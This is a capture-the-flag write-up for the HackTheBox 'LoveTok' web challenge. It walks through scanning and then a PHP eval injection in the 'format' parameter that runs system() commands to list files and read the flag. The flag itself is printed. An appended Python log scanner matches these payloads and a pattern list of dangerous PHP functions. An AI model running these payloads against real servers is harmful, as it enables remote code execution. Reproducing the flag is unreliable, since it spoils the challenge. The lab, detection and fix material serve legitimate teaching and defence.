---
title: 'HackTheBox: LoveTok'
disqus: hackmd
---

HackTheBox: LoveTok
===

## Table of Contents

[TOC]

## Topic

### Lab

#### HackTheBox: https://app.hackthebox.com/challenges/198

### Initial Enumeration

- Start Machine: http://206.189.28.180:30492/

## Solution

### 1. Attempt

#### 1.1 nmap scan

> nmap -sC -sV -T4 206.189.28.180

> This challenge is not a pentest box; only port 30492 is open.

#### 1.2 dirsearch scan

> dirsearch -u http://206.189.28.180:30492/

> /.DS_Store

- [What .DS_Store is for](https://zh.wikipedia.org/zh-tw/.DS_Store)

#### 1.3 Browse

##### 1.3.1 Click on the button; the URL changes

> http://206.189.28.180:30492/?format=r

##### 1.3.2 Edit the URL

> http://206.189.28.180:30492/?format=chw

**(Text Changed)**

> 2023-10-16T22:24:07+00:00101

### 2. Web shell

#### 2.1 system() function

- Web Shell: https://www.imperva.com/learn/application-security/web-shell/
- HackTricks: [PHP Code Execution](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass#php-code-execution)

(The machine was restarted, so the IP changed.)

> http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls

#### 2.2 Check the downloaded challenge files

##### 2.2.1 index.php is located in LoveTok\web_lovetok\challenge

##### 2.2.2 Find the flag location: \LoveTok\web_lovetok

#### 2.3 Find the flag through the web shell

> TEST: http://142.93.32.153:30198/?format=${phpinfo()}
>
> http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=ls+../ (URL encoding: space = '+')

### 3. Find Flag

> http://142.93.32.153:30198/?format=${system($_GET[cmd])}&cmd=cat+../flagNBD9R

> **FLAG: HTB{wh3n_l0v3_g3ts_eval3d_sh3lls_st4rt_p0pp1ng}**

###### tags: `Web` `CTF` `Webshell`
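Added example (not part of the original writeup or of the challenge's code): detection logic a defender could run over web-server access logs to spot the `${...}` string-interpolation payloads shown above. The combined-log format, the client IPs, the request lines and the `format`/`cmd` parameter names are constructed assumptions for this example; the allowlist for the date-format parameter is likewise an assumption based on the legitimate values `r` and `chw` seen in the writeup.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined-log style); the IPs and requests
# are made up for this example, not captured from the challenge server.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Oct/2023:22:24:07 +0000] "GET /?format=r HTTP/1.1" 200 512
10.0.0.5 - - [16/Oct/2023:22:24:09 +0000] "GET /?format=chw HTTP/1.1" 200 512
10.0.0.9 - - [16/Oct/2023:22:25:01 +0000] "GET /?format=${system($_GET[cmd])}&cmd=ls+../ HTTP/1.1" 200 1093
10.0.0.9 - - [16/Oct/2023:22:25:30 +0000] "GET /?format=%24%7Bphpinfo()%7D HTTP/1.1" 200 60211
10.0.0.9 - - [16/Oct/2023:22:26:00 +0000] "GET /?format=${system($_GET[cmd])}&cmd=cat+../flag HTTP/1.1" 200 70
"""

# Combined-log request line: client IP, timestamp, method, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# PHP "complex" string interpolation markers: ${expr} and {$var}. When a
# double-quoted string containing them is passed to eval, the expression runs.
INTERP_RE = re.compile(r'\$\{|\{\$')

# Function calls an attacker typically reaches for once interpolation works.
PHP_CALL_RE = re.compile(
    r'\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|phpinfo)\s*\(',
    re.IGNORECASE,
)

# Assumed allowlist for the date-format parameter: letters, digits and a few
# separators cover legitimate PHP date() formats such as "r" or "chw";
# $, {, ( and quotes never belong in one.
SAFE_FORMAT_RE = re.compile(r'^[A-Za-z0-9 :/.,\\-]*$')


def classify_value(name: str, value: str) -> list[str]:
    """Return the reasons a decoded query-string value looks like a PHP injection attempt."""
    reasons = []
    if INTERP_RE.search(value):
        reasons.append("php-string-interpolation")
    call = PHP_CALL_RE.search(value)
    if call:
        reasons.append(f"php-call:{call.group(1).lower()}")
    if name == "format" and not SAFE_FORMAT_RE.match(value):
        reasons.append("format-chars-outside-allowlist")
    return reasons


def scan_line(line: str) -> list[dict]:
    """Parse one access-log line and classify every query parameter after URL decoding."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # parse_qsl percent-decodes and turns '+' into a space, so the encoded
    # %24%7B and the literal ${ are matched the same way.
    for name, value in parse_qsl(query, keep_blank_values=True):
        reasons = classify_value(name, value)
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "param": name,
                "value": value,
                "reasons": reasons,
            })
    return findings


def scan_log(text: str) -> list[dict]:
    """Scan a whole log; returns one finding per suspicious parameter."""
    return [f for line in text.splitlines() for f in scan_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} param={f['param']!r} value={f['value']!r} "
              f"{','.join(f['reasons'])}")
```

Matching is done on the decoded parameter values rather than the raw request line, which is why the percent-encoded `phpinfo()` request is caught alongside the literal ones; a rule that only greps for `${` in raw logs misses it. The allowlist check on `format` is the more durable signal, since it flags any character that a `date()` format string has no reason to contain regardless of which function name the payload uses. Detection is a backstop: the root cause is a double-quoted, user-controlled string reaching `eval`, and the server-side fix is to hand the format straight to `date()` instead of building code from it.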